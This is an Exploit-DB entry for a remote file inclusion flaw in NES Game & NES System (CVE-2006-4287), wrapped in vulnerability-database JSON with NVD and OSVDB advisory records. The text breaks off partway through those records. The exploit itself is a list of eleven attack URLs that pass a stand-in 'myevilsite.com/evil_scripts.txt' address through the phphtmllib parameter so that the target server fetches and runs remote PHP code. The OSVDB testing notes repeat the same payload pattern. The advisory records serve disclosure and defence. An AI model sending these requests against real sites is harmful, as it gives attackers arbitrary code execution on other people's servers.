NES Game and NES System <= c108122 File Include Vulnerabilities
2006-08-20T00:00:00
ID EDB-ID:2226 Type exploitdb Reporter Kacper Modified 2006-08-20T00:00:00
Description
NES Game and NES System <= c108122 File Include Vulnerabilities. CVE-2006-4287. Webapps exploit for php platform
/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- NES Game & NES System <= c108122 (phphtmllib) Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: NES Game & NES System v. c108122
- [Script site: http://sourceforge.net/projects/nesgame
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Find by: Kacper (a.k.a Rahim)
+
- Contact: kacper1964@yahoo.pl
- or
- http://www.devilteam.yum.pl/
- and
- http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Z Dedykacja dla osoby,
- bez ktorej nie mogl bym zyc...
- K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*
a lot of include vulnerability .....
*/
#Exploit:
http://www.site.com/[NES_path]/phphtmllib/includes.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/divtag_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/form_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/html_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/localinc.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/FooterNav.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/HTMLPageClass.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/InfoTable.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/localinc.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/NavTable.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/TextNav.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
# milw0rm.com [2006-08-20]
{"id": "EDB-ID:2226", "type": "exploitdb", "bulletinFamily": "exploit", "title": "NES Game and NES System <= c108122 File Include Vulnerabilities", "description": "NES Game and NES System <= c108122 File Include Vulnerabilities. CVE-2006-4287. Webapps exploit for php platform", "published": "2006-08-20T00:00:00", "modified": "2006-08-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2226/", "reporter": "Kacper", "references": [], "cvelist": ["CVE-2006-4287"], "lastseen": "2016-01-31T15:47:50", "viewCount": 6, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-01-31T15:47:50", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4287"]}, {"type": "osvdb", "idList": ["OSVDB:28047", "OSVDB:28049", "OSVDB:28045", "OSVDB:28053", "OSVDB:28051", "OSVDB:28044", "OSVDB:28048", "OSVDB:28046", "OSVDB:28052", "OSVDB:28054"]}], "modified": "2016-01-31T15:47:50", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/2226/", "sourceData": "/*\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- NES Game & NES System <= c108122 (phphtmllib) Remote File Include Vulnerability\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- [Script name: NES Game & NES System v. c108122\n- [Script site: http://sourceforge.net/projects/nesgame\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Find by: Kacper (a.k.a Rahim)\n+\n- Contact: kacper1964@yahoo.pl\n- or\n- http://www.devilteam.yum.pl/\n- and\n- http://www.rahim.webd.pl/\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Special Greetz: DragonHeart ;-)\n- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi\n-\n!@ Przyjazni nie da sie zamienic na marne korzysci @!\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Z Dedykacja dla osoby,\n- bez ktorej nie mogl bym zyc...\n- K.C:* J.M (a.k.a Magaja)\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n*/\n/*\n\na lot of include vulnerability .....\n\n*/\n#Exploit:\n\nhttp://www.site.com/[NES_path]/phphtmllib/includes.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\nhttp://www.site.com/[NES_path]/phphtmllib/tag_utils/divtag_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\nhttp://www.site.com/[NES_path]/phphtmllib/tag_utils/form_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\nhttp://www.site.com/[NES_path]/phphtmllib/tag_utils/html_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\nhttp://www.site.com/[NES_path]/phphtmllib/tag_utils/localinc.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\nhttp://www.site.com/[NES_path]/phphtmllib/widgets/FooterNav.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\nhttp://www.site.com/[NES_path]/phphtmllib/widgets/HTMLPageClass.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\nhttp://www.site.com/[NES_path]/phphtmllib/widgets/InfoTable.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\nhttp://www.site.com/[NES_path]/phphtmllib/widgets/localinc.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\nhttp://www.site.com/[NES_path]/phphtmllib/widgets/NavTable.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\nhttp://www.site.com/[NES_path]/phphtmllib/widgets/TextNav.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]\n\n# milw0rm.com [2006-08-20]\n", "osvdbidlist": ["28052", "28046", "28053", "28051", "28047", "28054", "28044", "28050", "28049", "28048", "28045"]}
{"cve": [{"lastseen": "2020-10-03T11:48:17", "description": "Multiple PHP remote file inclusion vulnerabilities in NES Game and NES System c108122 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) phphtmllib parameter to (a) phphtmllib/includes.php; tag_utils/ scripts including (b) divtag_utils.php, (c) form_utils.php, (d) html_utils.php, and (e) localinc.php; and widgets/ scripts including (f) FooterNav.php, (g) HTMLPageClass.php, (h) InfoTable.php, (i) localinc.php, (j) NavTable.php, and (k) TextNav.php.", "edition": 3, "cvss3": {}, "published": "2006-08-22T17:04:00", "title": "CVE-2006-4287", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4287"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:nes_game:nes_game:c108122", "cpe:/a:nes_system:nes_system:c108122"], "id": "CVE-2006-4287", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4287", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:nes_system:nes_system:c108122:*:*:*:*:*:*:*", "cpe:2.3:a:nes_game:nes_game:c108122:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4287"], "edition": 1, "description": "## Vulnerability Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to includes.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to includes.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[NES_path]/phphtmllib/includes.php?phphtmllib=[http://[attacker]/evil_scripts.txt]\n## References:\nVendor URL: http://sourceforge.net/projects/nesgame/\n[Secunia Advisory ID:21593](https://secuniaresearch.flexerasoftware.com/advisories/21593/)\n[Related OSVDB ID: 28051](https://vulners.com/osvdb/OSVDB:28051)\n[Related OSVDB ID: 28045](https://vulners.com/osvdb/OSVDB:28045)\n[Related OSVDB ID: 28050](https://vulners.com/osvdb/OSVDB:28050)\n[Related OSVDB ID: 28054](https://vulners.com/osvdb/OSVDB:28054)\n[Related OSVDB ID: 28046](https://vulners.com/osvdb/OSVDB:28046)\n[Related OSVDB ID: 28047](https://vulners.com/osvdb/OSVDB:28047)\n[Related OSVDB ID: 28049](https://vulners.com/osvdb/OSVDB:28049)\n[Related OSVDB ID: 28052](https://vulners.com/osvdb/OSVDB:28052)\n[Related OSVDB ID: 28053](https://vulners.com/osvdb/OSVDB:28053)\n[Related OSVDB ID: 28048](https://vulners.com/osvdb/OSVDB:28048)\nGeneric Exploit URL: http://milw0rm.com/exploits/2226\nFrSIRT Advisory: ADV-2006-3339\n[CVE-2006-4287](https://vulners.com/cve/CVE-2006-4287)\nBugtraq ID: 19611\n", "modified": "2006-08-20T10:03:58", "published": "2006-08-20T10:03:58", "href": "https://vulners.com/osvdb/OSVDB:28044", "id": "OSVDB:28044", "type": "osvdb", "title": "NES Game & NES System includes.php phphtmllib Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4287"], "edition": 1, "description": "## Vulnerability Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to tag_utils/divtag_utils.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to tag_utils/divtag_utils.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[NES_path]/phphtmllib/tag_utils/divtag_utils.php?phphtmllib=[http://[attacker]/evil_scripts.txt]\n## References:\nVendor URL: http://sourceforge.net/projects/nesgame/\n[Secunia Advisory ID:21593](https://secuniaresearch.flexerasoftware.com/advisories/21593/)\n[Related OSVDB ID: 28051](https://vulners.com/osvdb/OSVDB:28051)\n[Related OSVDB ID: 28050](https://vulners.com/osvdb/OSVDB:28050)\n[Related OSVDB ID: 28054](https://vulners.com/osvdb/OSVDB:28054)\n[Related OSVDB ID: 28046](https://vulners.com/osvdb/OSVDB:28046)\n[Related OSVDB ID: 28047](https://vulners.com/osvdb/OSVDB:28047)\n[Related OSVDB ID: 28049](https://vulners.com/osvdb/OSVDB:28049)\n[Related OSVDB ID: 28052](https://vulners.com/osvdb/OSVDB:28052)\n[Related OSVDB ID: 28053](https://vulners.com/osvdb/OSVDB:28053)\n[Related OSVDB ID: 28044](https://vulners.com/osvdb/OSVDB:28044)\n[Related OSVDB ID: 28048](https://vulners.com/osvdb/OSVDB:28048)\nGeneric Exploit URL: http://milw0rm.com/exploits/2226\nFrSIRT Advisory: ADV-2006-3339\n[CVE-2006-4287](https://vulners.com/cve/CVE-2006-4287)\nBugtraq ID: 19611\n", "modified": "2006-08-20T10:03:58", "published": "2006-08-20T10:03:58", "href": "https://vulners.com/osvdb/OSVDB:28045", "id": "OSVDB:28045", "type": "osvdb", "title": "NES Game & NES System divtag_utils.php phphtmllib Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4287"], "edition": 1, "description": "## Vulnerability Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to tag_utils/form_utils.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to tag_utils/form_utils.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[NES_path]/phphtmllib/tag_utils/form_utils.php?phphtmllib=[http://[attacker]/evil_scripts.txt]\n## References:\nVendor URL: http://sourceforge.net/projects/nesgame/\n[Secunia Advisory ID:21593](https://secuniaresearch.flexerasoftware.com/advisories/21593/)\n[Related OSVDB ID: 28051](https://vulners.com/osvdb/OSVDB:28051)\n[Related OSVDB ID: 28045](https://vulners.com/osvdb/OSVDB:28045)\n[Related OSVDB ID: 28050](https://vulners.com/osvdb/OSVDB:28050)\n[Related OSVDB ID: 28054](https://vulners.com/osvdb/OSVDB:28054)\n[Related OSVDB ID: 28047](https://vulners.com/osvdb/OSVDB:28047)\n[Related OSVDB ID: 28049](https://vulners.com/osvdb/OSVDB:28049)\n[Related OSVDB ID: 28052](https://vulners.com/osvdb/OSVDB:28052)\n[Related OSVDB ID: 28053](https://vulners.com/osvdb/OSVDB:28053)\n[Related OSVDB ID: 28044](https://vulners.com/osvdb/OSVDB:28044)\n[Related OSVDB ID: 28048](https://vulners.com/osvdb/OSVDB:28048)\nGeneric Exploit URL: http://milw0rm.com/exploits/2226\nFrSIRT Advisory: ADV-2006-3339\n[CVE-2006-4287](https://vulners.com/cve/CVE-2006-4287)\nBugtraq ID: 19611\n", "modified": "2006-08-20T10:03:58", "published": "2006-08-20T10:03:58", "href": "https://vulners.com/osvdb/OSVDB:28046", "id": "OSVDB:28046", "type": "osvdb", "title": "NES Game & NES System form_utils.php phphtmllib Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4287"], "edition": 1, "description": "## Vulnerability Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to tag_utils/html_utils.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to tag_utils/html_utils.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[NES_path]/phphtmllib/tag_utils/html_utils.php?phphtmllib=[http://[attacker]/evil_scripts.txt]\n## References:\nVendor URL: http://sourceforge.net/projects/nesgame/\n[Secunia Advisory ID:21593](https://secuniaresearch.flexerasoftware.com/advisories/21593/)\n[Related OSVDB ID: 28051](https://vulners.com/osvdb/OSVDB:28051)\n[Related OSVDB ID: 28045](https://vulners.com/osvdb/OSVDB:28045)\n[Related OSVDB ID: 28050](https://vulners.com/osvdb/OSVDB:28050)\n[Related OSVDB ID: 28054](https://vulners.com/osvdb/OSVDB:28054)\n[Related OSVDB ID: 28046](https://vulners.com/osvdb/OSVDB:28046)\n[Related OSVDB ID: 28049](https://vulners.com/osvdb/OSVDB:28049)\n[Related OSVDB ID: 28052](https://vulners.com/osvdb/OSVDB:28052)\n[Related OSVDB ID: 28053](https://vulners.com/osvdb/OSVDB:28053)\n[Related OSVDB ID: 28044](https://vulners.com/osvdb/OSVDB:28044)\n[Related OSVDB ID: 28048](https://vulners.com/osvdb/OSVDB:28048)\nGeneric Exploit URL: http://milw0rm.com/exploits/2226\nFrSIRT Advisory: ADV-2006-3339\n[CVE-2006-4287](https://vulners.com/cve/CVE-2006-4287)\nBugtraq ID: 19611\n", "modified": "2006-08-20T10:03:58", "published": "2006-08-20T10:03:58", "href": "https://vulners.com/osvdb/OSVDB:28047", "id": "OSVDB:28047", "type": "osvdb", "title": "NES Game & NES System html_utils.php phphtmllib Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4287"], "edition": 1, "description": "## Vulnerability Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to tag_utils/localinc.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to tag_utils/localinc.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[NES_path]/phphtmllib/tag_utils/localinc.php?phphtmllib=[http://[attacker]/evil_scripts.txt]\n## References:\nVendor URL: http://sourceforge.net/projects/nesgame/\n[Secunia Advisory ID:21593](https://secuniaresearch.flexerasoftware.com/advisories/21593/)\n[Related OSVDB ID: 28051](https://vulners.com/osvdb/OSVDB:28051)\n[Related OSVDB ID: 28045](https://vulners.com/osvdb/OSVDB:28045)\n[Related OSVDB ID: 28050](https://vulners.com/osvdb/OSVDB:28050)\n[Related OSVDB ID: 28054](https://vulners.com/osvdb/OSVDB:28054)\n[Related OSVDB ID: 28046](https://vulners.com/osvdb/OSVDB:28046)\n[Related OSVDB ID: 28047](https://vulners.com/osvdb/OSVDB:28047)\n[Related OSVDB ID: 28049](https://vulners.com/osvdb/OSVDB:28049)\n[Related OSVDB ID: 28052](https://vulners.com/osvdb/OSVDB:28052)\n[Related OSVDB ID: 28053](https://vulners.com/osvdb/OSVDB:28053)\n[Related OSVDB ID: 28044](https://vulners.com/osvdb/OSVDB:28044)\nGeneric Exploit URL: http://milw0rm.com/exploits/2226\nFrSIRT Advisory: ADV-2006-3339\n[CVE-2006-4287](https://vulners.com/cve/CVE-2006-4287)\nBugtraq ID: 19611\n", "modified": "2006-08-20T10:03:58", "published": "2006-08-20T10:03:58", "href": "https://vulners.com/osvdb/OSVDB:28048", "id": "OSVDB:28048", "type": "osvdb", "title": "NES Game & NES System tag_utils/localinc.php phphtmllib Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4287"], "edition": 1, "description": "## Vulnerability Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to widgets/FooterNav.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to widgets/FooterNav.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[NES_path]/phphtmllib/widgets/FooterNav.php?phphtmllib=[http://[attacker]/evil_scripts.txt]\n## References:\nVendor URL: http://sourceforge.net/projects/nesgame/\n[Secunia Advisory ID:21593](https://secuniaresearch.flexerasoftware.com/advisories/21593/)\n[Related OSVDB ID: 28051](https://vulners.com/osvdb/OSVDB:28051)\n[Related OSVDB ID: 28045](https://vulners.com/osvdb/OSVDB:28045)\n[Related OSVDB ID: 28050](https://vulners.com/osvdb/OSVDB:28050)\n[Related OSVDB ID: 28054](https://vulners.com/osvdb/OSVDB:28054)\n[Related OSVDB ID: 28046](https://vulners.com/osvdb/OSVDB:28046)\n[Related OSVDB ID: 28047](https://vulners.com/osvdb/OSVDB:28047)\n[Related OSVDB ID: 28052](https://vulners.com/osvdb/OSVDB:28052)\n[Related OSVDB ID: 28053](https://vulners.com/osvdb/OSVDB:28053)\n[Related OSVDB ID: 28044](https://vulners.com/osvdb/OSVDB:28044)\n[Related OSVDB ID: 28048](https://vulners.com/osvdb/OSVDB:28048)\nGeneric Exploit URL: http://milw0rm.com/exploits/2226\nFrSIRT Advisory: ADV-2006-3339\n[CVE-2006-4287](https://vulners.com/cve/CVE-2006-4287)\nBugtraq ID: 19611\n", "modified": "2006-08-20T10:03:58", "published": "2006-08-20T10:03:58", "href": "https://vulners.com/osvdb/OSVDB:28049", "id": "OSVDB:28049", "type": "osvdb", "title": "NES Game & NES System FooterNav.php phphtmllib Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4287"], "edition": 1, "description": "## Vulnerability Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to HTMLPageClass.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to HTMLPageClass.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[NES_path]/phphtmllib/widgets/HTMLPageClass.php?phphtmllib=[http://[attacker]/evil_scripts.txt]\n## References:\nVendor URL: http://sourceforge.net/projects/nesgame/\n[Secunia Advisory ID:21593](https://secuniaresearch.flexerasoftware.com/advisories/21593/)\n[Related OSVDB ID: 28051](https://vulners.com/osvdb/OSVDB:28051)\n[Related OSVDB ID: 28045](https://vulners.com/osvdb/OSVDB:28045)\n[Related OSVDB ID: 28054](https://vulners.com/osvdb/OSVDB:28054)\n[Related OSVDB ID: 28046](https://vulners.com/osvdb/OSVDB:28046)\n[Related OSVDB ID: 28047](https://vulners.com/osvdb/OSVDB:28047)\n[Related OSVDB ID: 28049](https://vulners.com/osvdb/OSVDB:28049)\n[Related OSVDB ID: 28052](https://vulners.com/osvdb/OSVDB:28052)\n[Related OSVDB ID: 28053](https://vulners.com/osvdb/OSVDB:28053)\n[Related OSVDB ID: 28044](https://vulners.com/osvdb/OSVDB:28044)\n[Related OSVDB ID: 28048](https://vulners.com/osvdb/OSVDB:28048)\nGeneric Exploit URL: http://milw0rm.com/exploits/2226\nFrSIRT Advisory: ADV-2006-3339\n[CVE-2006-4287](https://vulners.com/cve/CVE-2006-4287)\nBugtraq ID: 19611\n", "modified": "2006-08-20T10:03:58", "published": "2006-08-20T10:03:58", "href": "https://vulners.com/osvdb/OSVDB:28050", "id": "OSVDB:28050", "type": "osvdb", "title": "NES Game & NES System HTMLPageClass.php phphtmllib Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4287"], "edition": 1, "description": "## Vulnerability Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to widgets/InfoTable.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to widgets/InfoTable.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[NES_path]/phphtmllib/widgets/InfoTable.php?phphtmllib=[http://[attacker]/evil_scripts.txt]\n## References:\nVendor URL: http://sourceforge.net/projects/nesgame/\n[Secunia Advisory ID:21593](https://secuniaresearch.flexerasoftware.com/advisories/21593/)\n[Related OSVDB ID: 28045](https://vulners.com/osvdb/OSVDB:28045)\n[Related OSVDB ID: 28050](https://vulners.com/osvdb/OSVDB:28050)\n[Related OSVDB ID: 28054](https://vulners.com/osvdb/OSVDB:28054)\n[Related OSVDB ID: 28046](https://vulners.com/osvdb/OSVDB:28046)\n[Related OSVDB ID: 28047](https://vulners.com/osvdb/OSVDB:28047)\n[Related OSVDB ID: 28049](https://vulners.com/osvdb/OSVDB:28049)\n[Related OSVDB ID: 28052](https://vulners.com/osvdb/OSVDB:28052)\n[Related OSVDB ID: 28053](https://vulners.com/osvdb/OSVDB:28053)\n[Related OSVDB ID: 28044](https://vulners.com/osvdb/OSVDB:28044)\n[Related OSVDB ID: 28048](https://vulners.com/osvdb/OSVDB:28048)\nGeneric Exploit URL: http://milw0rm.com/exploits/2226\nFrSIRT Advisory: ADV-2006-3339\n[CVE-2006-4287](https://vulners.com/cve/CVE-2006-4287)\nBugtraq ID: 19611\n", "modified": "2006-08-20T10:03:58", "published": "2006-08-20T10:03:58", "href": "https://vulners.com/osvdb/OSVDB:28051", "id": "OSVDB:28051", "type": "osvdb", "title": "NES Game & NES System InfoTable.php phphtmllib Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4287"], "edition": 1, "description": "## Vulnerability Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to widgets/localinc.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains 